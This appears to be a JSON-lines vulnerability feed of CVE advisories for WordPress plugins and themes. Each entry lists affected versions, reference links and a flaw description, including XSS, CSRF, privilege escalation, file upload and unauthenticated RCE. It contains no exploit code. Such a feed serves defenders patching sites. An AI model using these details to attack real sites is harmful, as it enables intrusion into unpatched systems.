{"CVE_ID":"CVE-2024-11411","slug":"spotlightr","versionImpact":"0.1.9","description":"The Spotlightr plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spotlightr-v' shortcode in all versions up to, and including, 0.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotlightr\\\/trunk\\\/spotlightr.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotlightr\\\/trunk\\\/spotlightr.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spotlightr\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spotlightr\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/475f2758-27a5-4a36-8085-576ee341938b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/475f2758-27a5-4a36-8085-576ee341938b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13094","slug":"wp-triggers-lite","versionImpact":"2.5.3","description":"The WP Triggers Lite WordPress plugin through 2.5.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a75809e-824e-458e-bd01-50dadcea7713\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a75809e-824e-458e-bd01-50dadcea7713\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a75809e-824e-458e-bd01-50dadcea7713\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a75809e-824e-458e-bd01-50dadcea7713\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0801","slug":"ratemyagent-official","versionImpact":"1.4.0","description":"The RateMyAgent Official plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.0. This is due to missing or incorrect nonce validation on the 'rma-settings-wizard'. This makes it possible for unauthenticated attackers to update the plugin's API key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244718%40ratemyagent-official&new=3244718%40ratemyagent-official&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244718%40ratemyagent-official&new=3244718%40ratemyagent-official&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ratemyagent-official\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ratemyagent-official\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b559017c-f1d2-4f18-bfb6-e52f05910e34?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b559017c-f1d2-4f18-bfb6-e52f05910e34?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7195","slug":"wp-reply-notify","versionImpact":"1.1","description":"The WP-Reply Notify WordPress plugin through 1.1 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72279ca0-6365-4c83-adca-4d8e5808a8c5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72279ca0-6365-4c83-adca-4d8e5808a8c5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4216","slug":"ecava-diot-scada","versionImpact":"1.0.5.1","description":"The DIOT SCADA with MQTT plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'diot' shortcode in all versions up to, and including, 1.0.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecava-diot-scada\\\/trunk\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecava-diot-scada\\\/trunk\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf23d79-5bd3-4224-835d-174653ddd504?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf23d79-5bd3-4224-835d-174653ddd504?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6813","slug":"aapanel-wp-toolkit","description":"The aapanel WP Toolkit plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization checks within the auto_login() function in versions 1.0 to 1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to bypass all role checks and gain full admin privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aapanel-wp-toolkit\\\/tags\\\/1.1\\\/includes\\\/class-aapanel-wp-toolkit-agent.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aapanel-wp-toolkit\\\/tags\\\/1.1\\\/includes\\\/class-aapanel-wp-toolkit-agent.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aapanel-wp-toolkit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aapanel-wp-toolkit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/430a0b93-2cb7-45bf-86ac-4a8b3a0be77a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/430a0b93-2cb7-45bf-86ac-4a8b3a0be77a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8567","slug":"the-plus-addons-for-block-editor","versionImpact":"4.5.4","description":"The Nexter Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 4.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342664\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342664\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-block-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-block-editor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca9ad8ca-aad1-4950-b540-64ffc4a07c12?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca9ad8ca-aad1-4950-b540-64ffc4a07c12?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25145","slug":"pirate-forms","versionImpact":"2.5.1","description":"The Contact Form & SMTP Plugin by PirateForms plugin for WordPress is vulnerable to HTML injection in the \u2018public\/class-pirateforms-public.php\u2019 file in versions up to, and including, 2.5.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary HTML in emails that could be used to phish unsuspecting victims.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e34c3f6-cc84-4e45-9948-6f7fd5cba8cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e34c3f6-cc84-4e45-9948-6f7fd5cba8cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/html-injection-vulnerability-in-wordpress-pirate-forms-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/html-injection-vulnerability-in-wordpress-pirate-forms-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2529","slug":"enable-svg-uploads","versionImpact":"2.1.5","description":"The Enable SVG Uploads WordPress plugin through 2.1.5 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ac03907-2373-48f0-bca1-8f7073c06b18\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ac03907-2373-48f0-bca1-8f7073c06b18\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5566","slug":"smpl-shortcodes","versionImpact":"1.0.20","description":"The Simple Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.0.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L386\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L386\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L257\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L292\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L292\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a153d6b2-e3fd-42db-90ba-d899a07d60c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a153d6b2-e3fd-42db-90ba-d899a07d60c1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1501","slug":"wordpress-database-reset","versionImpact":"3.22","description":"The Database Reset plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.22. This is due to missing or incorrect nonce validation on the install_wpr() function. This makes it possible for unauthenticated attackers to install the WP Reset Plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2e493cf-d022-404d-a501-a6671e6116f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2e493cf-d022-404d-a501-a6671e6116f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-database-reset\\\/trunk\\\/class-db-reset-admin.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-database-reset\\\/trunk\\\/class-db-reset-admin.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037742%40wordpress-database-reset&new=3037742%40wordpress-database-reset&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037742%40wordpress-database-reset&new=3037742%40wordpress-database-reset&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4363","slug":"visual-portfolio","versionImpact":"3.3.2","description":"The Visual Portfolio, Photo Gallery & Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title_tag\u2019 parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab5e09d8-6fa3-4a5b-bee1-6648df4f4b3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab5e09d8-6fa3-4a5b-bee1-6648df4f4b3b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/visual-portfolio\\\/trunk\\\/templates\\\/items-list\\\/item-parts\\\/title.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/visual-portfolio\\\/trunk\\\/templates\\\/items-list\\\/item-parts\\\/title.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/visual-portfolio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/visual-portfolio\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5768","slug":"mimo-woocommerce-order-tracking","versionImpact":"1.0.2","description":"The MIMO Woocommerce Order Tracking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mimo_update_provider' function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update shipping provider information, including adding stored cross-site scripting.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa26e595-947c-4327-bbe1-c347688f1209?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa26e595-947c-4327-bbe1-c347688f1209?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L304\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9115","slug":"common-tools-for-site","versionImpact":"1.0.2","description":"The Common Tools for Site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0864b6e-e193-4704-99ec-a5f2232c4816?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0864b6e-e193-4704-99ec-a5f2232c4816?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/common-tools-for-site\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/common-tools-for-site\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10186","slug":"event-post","versionImpact":"5.9.6","description":"The Event post plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's events_cal shortcode in all versions up to, and including, 5.9.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3ae1c32-18a7-4109-a7ea-dfd18fa3a8e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3ae1c32-18a7-4109-a7ea-dfd18fa3a8e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/event-post\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/event-post\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182549\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182549\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10164","slug":"wpdm-premium-packages","versionImpact":"5.9.3","description":"The Premium Packages \u2013 Sell Digital Products Securely plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpdmpp_pay_link shortcode in all versions up to, and including, 5.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdm-premium-packages\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdm-premium-packages\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c1758fc-5b0b-4071-b31b-1d72e34cc924?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c1758fc-5b0b-4071-b31b-1d72e34cc924?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28165","slug":"wp-backup-bank","versionImpact":"4.0.28","description":"Missing Authorization vulnerability in Tech Banker Backup Bank: WordPress Backup Plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Backup Bank: WordPress Backup Plugin: from n\/a through 4.0.28.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-backup-bank\\\/vulnerability\\\/wordpress-backup-bank-wordpress-backup-plugin-plugin-4-0-28-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-backup-bank\\\/vulnerability\\\/wordpress-backup-bank-wordpress-backup-plugin-plugin-4-0-28-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13057","slug":"dyn-business-panel","versionImpact":"1.0.0","description":"The Dyn Business Panel WordPress plugin through 1.0.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f869a3d-1ac1-4d31-8fe5-9b9795b15b5b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f869a3d-1ac1-4d31-8fe5-9b9795b15b5b\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f869a3d-1ac1-4d31-8fe5-9b9795b15b5b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f869a3d-1ac1-4d31-8fe5-9b9795b15b5b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13639","slug":"expand-maker","versionImpact":"3.4.2","description":"The Read More & Accordion plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the expmDeleteData() function in all versions up to, and including, 3.4.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary 'read more' posts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/files\\\/ReadMoreAdminPost.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/files\\\/ReadMoreAdminPost.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/files\\\/ReadMoreAdminPost.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/files\\\/ReadMoreAdminPost.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239533\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239533\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/expand-maker\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/expand-maker\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65849267-8bb5-48fd-b95e-e89a1e744fe0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65849267-8bb5-48fd-b95e-e89a1e744fe0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12810","slug":"jobcareer","versionImpact":"7.1","description":"The JobCareer | Job Board Responsive WordPress Theme theme for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability checks on multiple functions in all versions up to, and including, 7.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files, generate backups, restore backups, update theme options, and reset theme options to default settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24889552-0db6-44e6-9b12-f31b5e92a42e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24889552-0db6-44e6-9b12-f31b5e92a42e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7174","slug":"abitgone-commentsafe","versionImpact":"1.0.0","description":"The aBitGone CommentSafe WordPress plugin through 1.0.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c1c6d61-5588-4c21-95f6-2818c4f5c355\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c1c6d61-5588-4c21-95f6-2818c4f5c355\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6781","slug":"copymatic","versionImpact":"2.1","description":"The Copymatic \u2013 AI Content Writer & Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1. This is due to missing or incorrect nonce validation on the 'copymatic-menu' page. This makes it possible for unauthenticated attackers to update the copymatic_apikey option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/copymatic\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/copymatic\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f18b1276-3f43-447d-8251-095c2dd57938?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f18b1276-3f43-447d-8251-095c2dd57938?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8723","slug":"cf-image-resizing","versionImpact":"1.5.6","description":"The Cloudflare Image Resizing plugin for WordPress is vulnerable to Remote Code Execution due to missing authentication and insufficient sanitization within its hook_rest_pre_dispatch() method in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to inject arbitrary PHP into the codebase, achieving remote code execution.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337593\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337593\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341917\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341917\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf-image-resizing\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf-image-resizing\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f3b3c1a-1d45-4e2f-854a-171fe759257b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f3b3c1a-1d45-4e2f-854a-171fe759257b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4330","slug":"template-kit-import","versionImpact":"1.0.13","description":"The Envato Elements & Download and Template Kit \u2013 Import plugins for WordPress are vulnerable to arbitrary file uploads due to insufficient validation of file type upon extracting uploaded Zip files in the installFreeTemplateKit and uploadTemplateKitZipFile functions. This makes it possible for attackers with contributor-lever permissions and above to upload arbitrary files and potentially gain remote code execution in versions up to and including 1.0.13 of Template Kit \u2013 Import and versions up to and including 2.0.10 of Envato Elements & Download.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2617529%40envato-elements&new=2617529%40envato-elements&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2617529%40envato-elements&new=2617529%40envato-elements&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fe17e2-d5ab-4ebd-a5c6-d65cea327abd\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fe17e2-d5ab-4ebd-a5c6-d65cea327abd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
